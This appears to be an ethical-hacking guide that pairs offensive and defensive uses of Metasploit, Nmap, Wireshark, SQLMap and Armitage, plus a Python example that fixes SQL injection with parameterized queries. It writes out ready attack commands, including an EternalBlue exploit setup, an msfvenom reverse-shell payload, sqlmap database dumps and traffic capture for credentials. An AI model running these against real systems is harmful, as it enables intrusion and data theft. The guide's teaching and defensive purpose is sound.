Here’s a structured guide to using Metasploit, Nmap, Wireshark, SQLMap, and Armitage for both exploitation and system security. These tools are foundational in ethical hacking and can be used to find vulnerabilities and strengthen defenses:
1. Metasploit Framework
Exploitation Use Cases:
- Find and Exploit Vulnerabilities:
  - msfconsole
  - search exploit/windows/smb/ms17_010_eternalblue # Example: EternalBlue exploit
  - use exploit/windows/smb/ms17_010_eternalblue
  - set RHOSTS 192.168.1.100
  - set LHOST your_ip
  - exploit
- Payload Delivery:
  - msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f exe > payload.exe
Security Use Cases:
- Vulnerability Scanning:
  - msfconsole
  - db_nmap -sV -A 192.168.1.0/24 # Import scan results into the Metasploit DB
- Penetration Testing: Use Metasploit’s database to track vulnerabilities and prioritize fixes.
2. Nmap (Network Mapper)
Exploitation Use Cases:
- Network Reconnaissance:
  - nmap -sV -T4 -p- 192.168.1.100 # Aggressive scan for open ports and services
  - nmap --script vuln 192.168.1.100 # Run vulnerability scripts
- Identify Weak Services: Find unpatched services (e.g., outdated Apache, SMB).
Security Use Cases:
- Regular Vulnerability Scans:
  - nmap -sV --open -oA scan_results 192.168.1.0/24
- Firewall Configuration: Use Nmap results to close unnecessary open ports.
3. Wireshark
Exploitation Use Cases:
- Traffic Analysis: Capture packets to find credentials, API keys, or unencrypted data.
  - tshark -i eth0 -w capture.pcap # Capture traffic to a file
- MITM Attacks: Analyze HTTP traffic for SQLi or XSS payloads.
Security Use Cases:
- Detect Anomalies: Identify suspicious traffic patterns (e.g., unusual outbound connections).
- Post-Incident Analysis: Reconstruct attack paths after a breach.
4. SQLMap
Exploitation Use Cases:
- SQL Injection Attacks:
  - sqlmap -u "http://target.com/login.php?user=admin" --dbs # Enumerate databases
  - sqlmap -u "http://target.com/login.php?user=admin" --dump # Dump database tables
- Privilege Escalation: Exploit SQLi to gain administrative access to a database.
Security Use Cases:
- Web Application Testing: Scan for SQLi vulnerabilities in your own apps.
  - sqlmap -u "http://yourapp.com/api" --batch --level 5
- Input Validation Enforcement: Use findings to patch SQLi vulnerabilities (e.g., parameterized queries).
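An added example (not from the original guide) of the fix named in the last item: a login check that splices user input into the SQL string, beside its parameterized version, run against a constructed in-memory SQLite table. The regression check confirms the hardened version rejects the classic tautology input that the vulnerable one accepts. The `users` table, `login_vulnerable` and `login_parameterized` are assumed names for illustration.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data standing in for the app's user table.
    # Plaintext passwords only keep the sample short; real code stores a hash.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, user: str, password: str) -> bool:
    # The flaw sqlmap reports: input is spliced into the SQL text, so quotes
    # in the input change the structure of the query itself.
    sql = (f"SELECT 1 FROM users WHERE user = '{user}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, user: str, password: str) -> bool:
    # The fix: placeholders fix the query structure; the driver sends the
    # values separately, so quotes in the input are only data.
    sql = "SELECT 1 FROM users WHERE user = ? AND password = ?"
    return conn.execute(sql, (user, password)).fetchone() is not None


def regression_check() -> dict:
    """Report whether each implementation accepts a tautology probe in the
    password field. A hardened app must return False for the probe and
    True only for the real credential."""
    conn = make_db()
    probe = "' OR '1'='1"  # constructed test input, not a real credential
    return {
        "vulnerable_accepts_probe": login_vulnerable(conn, "admin", probe),
        "hardened_accepts_probe": login_parameterized(conn, "admin", probe),
        "hardened_accepts_valid": login_parameterized(conn, "admin", "correct-horse"),
    }


if __name__ == "__main__":
    print(regression_check())
```

Keep a check like `regression_check` in the app's test suite so the fix cannot be silently reverted by a later refactor.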
5. Armitage (Metasploit GUI)
Exploitation Use Cases:
- Visualize Exploits: Use Armitage’s GUI to manage exploits, payloads, and Meterpreter sessions.
- Steps:
  - Launch Armitage: armitage
  - Add a target IP.
  - Use the “Exploits” tab to search for vulnerabilities.
- Post-Exploitation: Deploy payloads and escalate privileges via the GUI.
Security Use Cases:
- Network Visualization: Map the network and identify high-risk systems (e.g., unpatched servers).
- Threat Hunting: Track Meterpreter sessions to detect unauthorized access attempts.
6. Best Practices for Security
Based on Tool Findings:
- Patch Management:
  - Use Nmap/Metasploit results to prioritize patching CVEs (e.g., MS17-010).
- Network Segmentation:
  - Isolate vulnerable systems using firewall rules based on what Nmap scans identified.
- Web App Hardening:
  - Fix SQLi/XSS vulnerabilities found by SQLMap.
- Monitor Traffic:
  - Use Wireshark to detect data exfiltration or unauthorized protocols.
Quick Reference Table
| Tool | Exploitation Command | Security Command |
|---|---|---|
| Metasploit | msfconsole; use exploit/windows/smb/ms17_010_eternalblue | db_nmap -sV -A 192.168.1.0/24 |
| Nmap | nmap -sV --script vuln 192.168.1.100 | nmap -sV --open -oA scan_results 192.168.1.0/24 |
| Wireshark | tshark -i eth0 -w capture.pcap | Analyze traffic for anomalies |
| SQLMap | sqlmap -u "http://target.com/login.php" --dump | sqlmap -u "http://yourapp.com/api" --batch |
| Armitage | Launch GUI to manage exploits and payloads | Visualize network topology and track Meterpreter sessions |
Ethical & Legal Considerations
- Authorization: Only test systems you own or with explicit permission.
- Scope: Define clear boundaries to avoid unintended damage.
- Disclosure: Report findings to the affected organization if authorized.
Example Workflow
- Reconnaissance:
  - Use Nmap to scan a network for open ports and services.
- Exploitation:
  - Use Metasploit to exploit an unpatched SMB service.
  - Use SQLMap to extract database credentials.
- Post-Exploitation:
  - Use Meterpreter to escalate privileges via Armitage.
- Security Response:
  - Patch the SMB vulnerability and the SQLi flaw.
  - Close unnecessary ports using firewall rules.
Practice Resources
- Tools:
  - Kali Linux: Pre-installed tools for all scenarios.
  - Metasploitable VM: A vulnerable VM for testing.
- Platforms:
  - Hack The Box (real-world exploitation).
  - TryHackMe (rooms like “Metasploit” and “SQLi”).
By mastering these tools and applying them ethically, you can both exploit vulnerabilities and strengthen system defenses. Always prioritize legal compliance and responsible disclosure! 🔍🛡️